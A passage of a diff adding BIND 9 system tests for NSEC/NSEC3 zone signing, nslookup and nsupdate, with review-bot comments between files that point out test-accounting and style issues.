+ grep "${ZONE}\..*IN.*RRSIG" "dig.out.test$n.wait" > /dev/null || return 1
+ grep "${ZONE}\..*IN.*NSEC3PARAM" "dig.out.test$n.wait" > /dev/null && return 1
+ return 0
+}
+
+# Wait for the zone to be signed.
+wait_for_zone_is_signed() {
+ n=$((n+1))
+ ret=0
+ echo_i "wait for ${ZONE} to be signed ($n)"
+
+ if [ "$1" = "nsec3" ]; then
+ retry_quiet 10 _wait_for_nsec3param || log_error "wait for ${ZONE} to be signed failed"
+ else
+ retry_quiet 10 _wait_for_nsec || log_error "wait for ${ZONE} to be signed failed"
+ fi
+
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+}
+
+# Test: check NSEC in answers
+_check_nsec_nsec3param()
+{
+ dig_with_opts +noquestion @$SERVER "${ZONE}" NSEC3PARAM > "dig.out.test$n.nsec3param.$ZONE" || return 1
+ grep "NSEC3PARAM" "dig.out.test$n.nsec3param.$ZONE" > /dev/null && return 1
+ return 0
+}
+
+_check_nsec_nxdomain()
+{
+ dig_with_opts @$SERVER "nosuchname.${ZONE}" > "dig.out.test$n.nxdomain.$ZONE" || return 1
+ grep "${ZONE}.*IN.*NSEC.*NS.*SOA.*RRSIG.*NSEC.*DNSKEY" "dig.out.test$n.nxdomain.$ZONE" > /dev/null || return 1
+ grep "NSEC3" "dig.out.test$n.nxdomain.$ZONE" > /dev/null && return 1
+ return 0
+}
+
+check_nsec()
+{
+ n=$((n+1))
+ echo_i "check NSEC3PARAM response for zone ${ZONE} ($n)"
+ ret=0
+ retry_quiet 10 _check_nsec_nsec3param || log_error "unexpected NSEC3PARAM in response for zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check NXDOMAIN response for zone ${ZONE} ($n)"
+ ret=0
+ retry_quiet 10 _check_nsec_nxdomain || log_error "bad NXDOMAIN response for zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+}
+
+# Test: check NSEC3 parameters in answers
+_check_nsec3_nsec3param()
+{
+ dig_with_opts +noquestion @$SERVER "${ZONE}" NSEC3PARAM > "dig.out.test$n.nsec3param.$ZONE" || return 1
+ grep "${ZONE}.*0.*IN.*NSEC3PARAM.*1.*0.*${ITERATIONS}.*${SALT}" "dig.out.test$n.nsec3param.$ZONE" > /dev/null || return 1
+
+ if [ -z "$SALT" ]; then
+ SALT=`awk '$4 == "NSEC3PARAM" { print $8 }' dig.out.test$n.nsec3param.$ZONE`
+ fi
+ return 0
+}
+
+_check_nsec3_nxdomain()
+{
+ dig_with_opts @$SERVER "nosuchname.${ZONE}" > "dig.out.test$n.nxdomain.$ZONE" || return 1
+ grep ".*\.${ZONE}.*IN.*NSEC3.*1.${FLAGS}.*${ITERATIONS}.*${SALT}" "dig.out.test$n.nxdomain.$ZONE" > /dev/null || return 1
+ return 0
+}
+
+check_nsec3()
+{
+ n=$((n+1))
+ echo_i "check that NSEC3PARAM 1 0 ${ITERATIONS} is published zone ${ZONE} ($n)"
+ ret=0
+ retry_quiet 10 _check_nsec3_nsec3param || log_error "bad NSEC3PARAM response for ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check NXDOMAIN response has correct NSEC3 1 ${FLAGS} ${ITERATIONS} ${SALT} for zone ${ZONE} ($n)"
+ ret=0
+ retry_quiet 10 _check_nsec3_nxdomain || log_error "bad NXDOMAIN response for zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+}
+
+start_time="$(TZ=UTC date +%s)"
+status=0
+n=0
+
+# Zone: nsec-to-nsec3.kasp.
+set_zone_policy "nsec-to-nsec3.kasp" "nsec"
+set_server "ns3" "10.53.0.3"
+echo_i "initial check zone ${ZONE}"
+check_nsec
+dnssec_verify
+
+# Zone: nsec3.kasp.
+set_zone_policy "nsec3.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dynamic.kasp.
+set_zone_policy "nsec3-dynamic.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-change.kasp.
+set_zone_policy "nsec3-change.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dynamic-change.kasp.
+set_zone_policy "nsec3-dynamic-change.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dynamic-to-inline.kasp.
+set_zone_policy "nsec3-dynamic-to-inline.kasp" "nsec3" 1 3600
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+
+# Zone: nsec3-inline-to-dynamic.kasp.
+set_zone_policy "nsec3-inline-to-dynamic.kasp" "nsec3" 1 3600
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+
+# Zone: nsec3-to-nsec.kasp.
+set_zone_policy "nsec3-to-nsec.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-to-optout.kasp.
+set_zone_policy "nsec3-to-optout.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-from-optout.kasp.
+set_zone_policy "nsec3-from-optout.kasp" "optout"
+set_nsec3param "1" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-other.kasp.
+set_zone_policy "nsec3-other.kasp" "nsec3-other"
+set_nsec3param "1" "11" "0"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-xfr-inline.kasp.
+# This is a secondary zone, where the primary is signed with NSEC3 but
+# the dnssec-policy dictates NSEC.
+set_zone_policy "nsec3-xfr-inline.kasp" "nsec" 1 3600
+echo_i "initial check zone ${ZONE}"
+check_nsec
+
+# Zone: nsec3-dynamic-update-inline.kasp.
+set_zone_policy "nsec3-dynamic-update-inline.kasp" "nsec" 1 3600
+echo_i "initial check zone ${ZONE}"
+check_nsec
+
+n=$((n+1))
+echo_i "dynamic update dnssec-policy zone ${ZONE} with NSEC3 ($n)"
+ret=0
+$NSUPDATE > update.out.$ZONE.test$n 2>&1 << END || ret=1
+server 10.53.0.3 ${PORT}
+zone ${ZONE}.
+update add 04O18462RI5903H8RDVL0QDT5B528DUJ.${ZONE}. 3600 NSEC3 0 0 0 408A4B2D412A4E95 1JMDDPMTFF8QQLIOINSIG4CR9OTICAOC A RRSIG
+send
+END
+wait_for_log 10 "updating zone '${ZONE}/IN': update failed: explicit NSEC3 updates are not allowed in secure zones (REFUSED)" ns3/named.run || ret=1
+check_nsec
+
+# Reconfig named.
+ret=0
+echo_i "reconfig dnssec-policy to trigger nsec3 rollovers"
+copy_setports ns3/named2.conf.in ns3/named.conf
+rndc_reconfig ns3 10.53.0.3
+
+# Zone: nsec-to-nsec3.kasp. (reconfigured)
+set_zone_policy "nsec-to-nsec3.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3.kasp. (same)
+set_zone_policy "nsec3.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dyamic.kasp. (same)
+set_zone_policy "nsec3-dynamic.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-change.kasp. (reconfigured)
+set_zone_policy "nsec3-change.kasp" "nsec3-other"
+set_nsec3param "1" "11" "0"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dynamic-change.kasp. (reconfigured)
+set_zone_policy "nsec3-dynamic-change.kasp" "nsec3-other"
+set_nsec3param "1" "11" "0"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-dynamic-to-inline.kasp. (same)
+set_zone_policy "nsec3-dynamic-to-inline.kasp" "nsec3" 1 3600
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+
+# Zone: nsec3-inline-to-dynamic.kasp. (same)
+set_zone_policy "nsec3-inline-to-dynamic.kasp" "nsec3" 1 3600
+set_nsec3param "0" "5" "8"
+echo_i "initial check zone ${ZONE}"
+check_nsec3
+
+# Zone: nsec3-to-nsec.kasp. (reconfigured)
+set_zone_policy "nsec3-to-nsec.kasp" "nsec"
+set_nsec3param "1" "11" "0"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec
+dnssec_verify
+
+# Zone: nsec3-to-optout.kasp. (reconfigured)
+# DISABLED:
+# There is a bug in the nsec3param building code that thinks when the
+# optout bit is changed, the chain already exists. [GL #2216]
+#set_zone_policy "nsec3-to-optout.kasp" "optout"
+#set_nsec3param "1" "5" "8"
+#echo_i "check zone ${ZONE} after reconfig"
+#check_nsec3
+#dnssec_verify
+
+# Zone: nsec3-from-optout.kasp. (reconfigured)
+# DISABLED:
+# There is a bug in the nsec3param building code that thinks when the
+# optout bit is changed, the chain already exists. [GL #2216]
+#set_zone_policy "nsec3-from-optout.kasp" "nsec3"
+#set_nsec3param "0" "5" "8"
+#echo_i "check zone ${ZONE} after reconfig"
+#check_nsec3
+#dnssec_verify
+
+# Zone: nsec3-other.kasp. (same)
+set_zone_policy "nsec3-other.kasp" "nsec3-other"
+set_nsec3param "1" "11" "0"
+echo_i "check zone ${ZONE} after reconfig"
+check_nsec3
+dnssec_verify
+
+# Using rndc signing -nsec3param (should fail)
+set_zone_policy "nsec3-change.kasp" "nsec3-other"
+echo_i "use rndc signing -nsec3param ${ZONE} to change NSEC3 settings"
+rndccmd $SERVER signing -nsec3param 1 1 12 ffff $ZONE > rndc.signing.test$n.$ZONE || log_error "failed to call rndc signing -nsec3param $ZONE"
+grep "zone uses dnssec-policy, use rndc dnssec command instead" rndc.signing.test$n.$ZONE > /dev/null || log_error "rndc signing -nsec3param should fail"
+check_nsec3
+dnssec_verify
+
+# Test NSEC3 and NSEC3PARAM is the same after restart
+set_zone_policy "nsec3.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} before restart"
+check_nsec3
+dnssec_verify
+
+# Restart named, NSEC3 should stay the same.
+ret=0
+echo "stop ns3"
+stop_server --use-rndc --port ${CONTROLPORT} ${DIR} || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+ret=0
+echo "start ns3"
+start_server --noclean --restart --port ${PORT} ${DIR}
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+prevsalt="${SALT}"
+set_zone_policy "nsec3.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+SALT="${prevsalt}"
+echo_i "check zone ${ZONE} after restart has salt ${SALT}"
+check_nsec3
+dnssec_verify
+
+# Zone: nsec3-fails-to-load.kasp. (should be fixed after reload)
+cp ns3/template.db.in ns3/nsec3-fails-to-load.kasp.db
+rndc_reload ns3 10.53.0.3
+
+set_zone_policy "nsec3-fails-to-load.kasp" "nsec3"
+set_nsec3param "0" "5" "8"
+echo_i "check zone ${ZONE} after reload"
+check_nsec3
+dnssec_verify
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/nslookup/clean.sh b/bin/tests/system/nslookup/clean.sh
new file mode 100644
index 0000000..439f90d
--- /dev/null
+++ b/bin/tests/system/nslookup/clean.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns1/example.db
+rm -f nslookup.out*
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/nslookup/ns1/example.net.db b/bin/tests/system/nslookup/ns1/example.net.db
new file mode 100644
index 0000000..73aeeb1
--- /dev/null
+++ b/bin/tests/system/nslookup/ns1/example.net.db
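Review bot: Two negative checks in this script can fail without failing the run: after the `nsupdate` attempt (`wait_for_log … || ret=1`) and after the `rndc signing -nsec3param` block (both `log_error` calls), the very next call is `check_nsec` or `check_nsec3`, which sets `ret=0` before `ret` was ever added to `status`. Both blocks assert that named refuses a change that would bypass dnssec-policy, so a regression in either refusal would pass unnoticed. The rndc block also reuses the previous `$n` for its `rndc.signing.test$n.$ZONE` output file. Separately, the restart step calls `start_server` without `|| ret=1`, so the `test "$ret" -eq 0` that follows can never report a failure. The fence shows the accounting lines I would add.

```sh
# … unchanged: nsupdate here-document attempting the explicit NSEC3 add …
wait_for_log 10 "updating zone '${ZONE}/IN': update failed: explicit NSEC3 updates are not allowed in secure zones (REFUSED)" ns3/named.run || ret=1
test "$ret" -eq 0 || echo_i "failed"
status=$((status+ret))
check_nsec

# … unchanged: reconfig and per-zone checks …

# Using rndc signing -nsec3param (should fail)
set_zone_policy "nsec3-change.kasp" "nsec3-other"
n=$((n+1))
echo_i "use rndc signing -nsec3param ${ZONE} to change NSEC3 settings ($n)"
ret=0
# … unchanged: rndccmd call and grep for the refusal message …
test "$ret" -eq 0 || echo_i "failed"
status=$((status+ret))
check_nsec3

# … unchanged: checks before restart, stop_server …
start_server --noclean --restart --port ${PORT} ${DIR} || ret=1
```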
@@ -0,0 +1,31 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+
+@ 86400 IN SOA ns1 hostmaster (
+ 1397051952 ; "SER0"
+ 5
+ 5
+ 1814400
+ 3600 )
+@ NS ns1
+ns1 A 10.53.0.1
+
+a-only A 1.2.3.4
+aaaa-only AAAA 2001::ffff
+
+dual A 1.2.3.4
+ AAAA 2001::ffff
+
+cname-a-only CNAME a-only
+cname-aaaa-only CNAME aaaa-only
+cname-dual CNAME dual
diff --git a/bin/tests/system/nslookup/ns1/named.conf.in b/bin/tests/system/nslookup/ns1/named.conf.in
new file mode 100644
index 0000000..67b4f4f
--- /dev/null
+++ b/bin/tests/system/nslookup/ns1/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+};
diff --git a/bin/tests/system/nslookup/setup.sh b/bin/tests/system/nslookup/setup.sh
new file mode 100644
index 0000000..8e4016e
--- /dev/null
+++ b/bin/tests/system/nslookup/setup.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+$SHELL ../genzone.sh 1 >ns1/example.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/nslookup/tests.sh b/bin/tests/system/nslookup/tests.sh
new file mode 100644
index 0000000..2be4eac
--- /dev/null
+++ b/bin/tests/system/nslookup/tests.sh
@@ -0,0 +1,112 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+status=0
+n=0
+
+n=`expr $n + 1`
+echo_i "Check that domain names that are too big when applying a search list entry are handled cleanly ($n)"
+ret=0
+l=012345678901234567890123456789012345678901234567890123456789012
+t=0123456789012345678901234567890123456789012345678901234567890
+d=$l.$l.$l.$t
+$NSLOOKUP -port=${PORT} -domain=$d -type=soa example 10.53.0.1 > nslookup.out${n} || ret=1
+grep "origin = ns1.example" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check A only lookup"
+ret=0
+$NSLOOKUP -port=${PORT} a-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep a-only.example.net nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check AAAA only lookup"
+ret=0
+$NSLOOKUP -port=${PORT} aaaa-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep aaaa-only.example.net nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check dual A + AAAA lookup"
+ret=0
+$NSLOOKUP -port=${PORT} dual.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep dual.example.net nslookup.out${n} | wc -l`
+test $lines = 2 || ret=1
+grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1
+grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check CNAME to A only lookup"
+ret=0
+$NSLOOKUP -port=${PORT} cname-a-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep "canonical name" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep a-only.example.net nslookup.out${n} | grep -v "canonical name" | wc -l`
+test $lines = 1 || ret=1
+grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check CNAME to AAAA only lookup"
+ret=0
+$NSLOOKUP -port=${PORT} cname-aaaa-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep "canonical name" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep aaaa-only.example.net nslookup.out${n} | grep -v "canonical name" |wc -l`
+test $lines = 1 || ret=1
+grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "Check CNAME to dual A + AAAA lookup"
+ret=0
+$NSLOOKUP -port=${PORT} cname-dual.example.net 10.53.0.1 > nslookup.out${n} || ret=1
+lines=`grep "Server:" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep "canonical name" nslookup.out${n} | wc -l`
+test $lines = 1 || ret=1
+lines=`grep dual.example.net nslookup.out${n} | grep -v "canonical name" | wc -l`
+test $lines = 2 || ret=1
+grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1
+grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/nsupdate/ans4/ans.pl b/bin/tests/system/nsupdate/ans4/ans.pl
new file mode 100644
index 0000000..d4299c4
--- /dev/null
+++ b/bin/tests/system/nsupdate/ans4/ans.pl
@@ -0,0 +1,60 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use IO::Socket;
+use IO::File;
+use strict;
+
+# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early
+local $SIG{PIPE} = 'IGNORE';
+
+# Flush logged output after every line
+local $| = 1;
+
+my $server_addr = "10.53.0.4";
+if (@ARGV > 0) {
+ $server_addr = @ARGV[0];
+}
+
+my $localport = int($ENV{'PORT'});
+if (!$localport) { $localport = 5300; }
+
+my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr",
+ LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!";
+
+print "listening on $server_addr:$localport.\n";
+
+my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!";
+print $pidf "$$\n" or die "cannot write pid file: $!";
+$pidf->close or die "cannot close pid file: $!";;
+sub rmpid { unlink "ans.pid"; exit 1; };
+
+$SIG{INT} = \&rmpid;
+$SIG{TERM} = \&rmpid;
+
+# Main
+for (;;) {
+ my $rin;
+ my $rout;
+
+ $rin = '';
+ vec($rin, fileno($udpsock), 1) = 1;
+
+ select($rout = $rin, undef, undef, undef);
+
+ if (vec($rout, fileno($udpsock), 1)) {
+ printf "UDP request\n";
+ my $buf;
+ $udpsock->recv($buf, 512);
+ }
+}
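Review bot: Only the first `echo_i` in this script prints the test number; every later message (`echo_i "Check A only lookup"` and the rest) omits `($n)`, so a failure in the log cannot be matched to its `nslookup.out${n}` file. Appending the counter, e.g. `echo_i "Check A only lookup ($n)"`, fixes that for all six messages. The address checks use `grep "1.2.3.4"` with unescaped dots, which also matches other characters in those positions; `grep -F "1.2.3.4"` states the intent exactly.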
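Review bot: `$server_addr = @ARGV[0];` takes a one-element array slice where the scalar `$ARGV[0]` is meant; it happens to work, but Perl reports it once warnings are enabled, and the script has `use strict` without `use warnings`. I would change the line to `$server_addr = $ARGV[0];` and add `use warnings;` next to `use strict;`. The loop under `# Main` reads each datagram with `recv($buf, 512)` and never sends a reply, which looks intentional for a timeout test; a comment such as `# Swallow every request without answering so the client has to time out.` would record that, if it is the intent.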
diff --git a/bin/tests/system/nsupdate/clean.sh b/bin/tests/system/nsupdate/clean.sh
new file mode 100644
index 0000000..1746ec1
--- /dev/null
+++ b/bin/tests/system/nsupdate/clean.sh
@@ -0,0 +1,69 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after zone transfer tests.
+#
+
+rm -f */*.jnl
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.run */ans.run
+rm -f */named.run.prev
+rm -f Kxxx.*
+rm -f check.out.*
+rm -f dig.out.*
+rm -f jp.out.ns3.*
+rm -f nextpart.out.*
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
+rm -f ns*/named.lock
+rm -f ns1/example.db ns1/unixtime.db ns1/yyyymmddvv.db ns1/update.db ns1/other.db ns1/keytests.db
+rm -f ns1/many.test.db
+rm -f ns1/maxjournal.db
+rm -f ns1/md5.key ns1/sha1.key ns1/sha224.key ns1/sha256.key ns1/sha384.key
+rm -f ns1/sample.db
+rm -f ns1/sha512.key ns1/ddns.key
+rm -f ns10/_default.tsigkeys
+rm -f ns10/example.com.db
+rm -f ns10/in-addr.db
+rm -f ns2/example.bk
+rm -f ns2/sample.db
+rm -f ns2/update.bk ns2/update.alt.bk
+rm -f ns3/*.signed
+rm -f ns3/K*
+rm -f ns3/delegation.test.db
+rm -f ns3/dnskey.test.db
+rm -f ns3/dsset-*
+rm -f ns3/example.db
+rm -f ns3/multisigner.test.db
+rm -f ns3/many.test.bk
+rm -f ns3/nsec3param.test.db
+rm -f ns3/too-big.test.db
+rm -f ns5/local.db
+rm -f ns6/in-addr.db
+rm -f ns7/_default.tsigkeys
+rm -f ns7/example.com.db
+rm -f ns7/in-addr.db
+rm -f ns8/_default.tsigkeys
+rm -f ns8/example.com.db
+rm -f ns8/in-addr.db
+rm -f ns9/_default.tsigkeys
+rm -f ns9/denyname.example.db
+rm -f ns9/example.com.db
+rm -f ns9/in-addr.db
+rm -f perl.update_test.out
+rm -f nsupdate.out*
+rm -f typelist.out.*
+rm -f update.out.*
+rm -f update.in.*
+rm -f verylarge
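Review bot: The header comment `# Clean up after zone transfer tests.` does not match this directory, which holds the nsupdate system test; it reads as carried over from another clean.sh. I would change it to `# Clean up after nsupdate tests.`. The script also removes generated key material (`ns1/*.key`, `ns*/_default.tsigkeys`, `ns3/K*`) by relative glob, so a second comment line saying it must be run from the test's own directory would make that assumption explicit.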
diff --git a/bin/tests/system/nsupdate/commandlist b/bin/tests/system/nsupdate/commandlist
new file mode 100644
index 0000000..41c8049
--- /dev/null
+++ b/bin/tests/system/nsupdate/commandlist
@@ -0,0 +1,15 @@
+server 127.0.0.1
+server 127.0.0.1 port
+update
+update delete
+update delete dummy
+update delete dummy in
+update delete dummy in a
+update delete dummy in a 127.0.0.1
+update add
+update add domain
+update add domain 0
+update add domain 0 in
+update add domain 0 in a
+update add domain 0 a
+update add domain 0 a in
diff --git a/bin/tests/system/nsupdate/knowngood.ns1.after b/bin/tests/system/nsupdate/knowngood.ns1.after
new file mode 100644
index 0000000..4114159
--- /dev/null
+++ b/bin/tests/system/nsupdate/knowngood.ns1.after
@@ -0,0 +1,99 @@ +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 2 2000 2000 1814400 3600 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. +*.example.nil. 300 IN MX 10 mail.example.nil. +a.example.nil. 300 IN TXT "foo foo foo" +a.example.nil. 300 IN PTR foo.net. +a01.example.nil. 3600 IN A 0.0.0.0 +a02.example.nil. 3600 IN A 255.255.255.255 +a601.example.nil. 3600 IN AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01.example.nil. 3600 IN AFSDB 0 hostname.example.nil. +afsdb02.example.nil. 3600 IN AFSDB 65535 . +b.example.nil. 300 IN CNAME foo.net. +c.example.nil. 300 IN A 73.80.65.49 +cert01.example.nil. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example.nil. 3600 IN CNAME cname-target. +cname02.example.nil. 3600 IN CNAME cname-target.example.nil. +cname03.example.nil. 3600 IN CNAME . +d.example.nil. 300 IN A 73.80.65.49 +dname01.example.nil. 3600 IN DNAME dname-target. +dname02.example.nil. 3600 IN DNAME dname-target.example.nil. +dname03.example.nil. 3600 IN DNAME . +e.example.nil. 300 IN MX 10 mail.example.nil. +e.example.nil. 300 IN TXT "one" +e.example.nil. 300 IN TXT "two" +e.example.nil. 300 IN TXT "three" +e.example.nil. 300 IN A 73.80.65.49 +e.example.nil. 300 IN A 73.80.65.50 +e.example.nil. 300 IN A 73.80.65.51 +e.example.nil. 300 IN A 73.80.65.52 +f.example.nil. 300 IN A 73.80.65.52 +gpos01.example.nil. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example.nil. 3600 IN GPOS "" "" "" +hinfo01.example.nil. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example.nil. 3600 IN HINFO 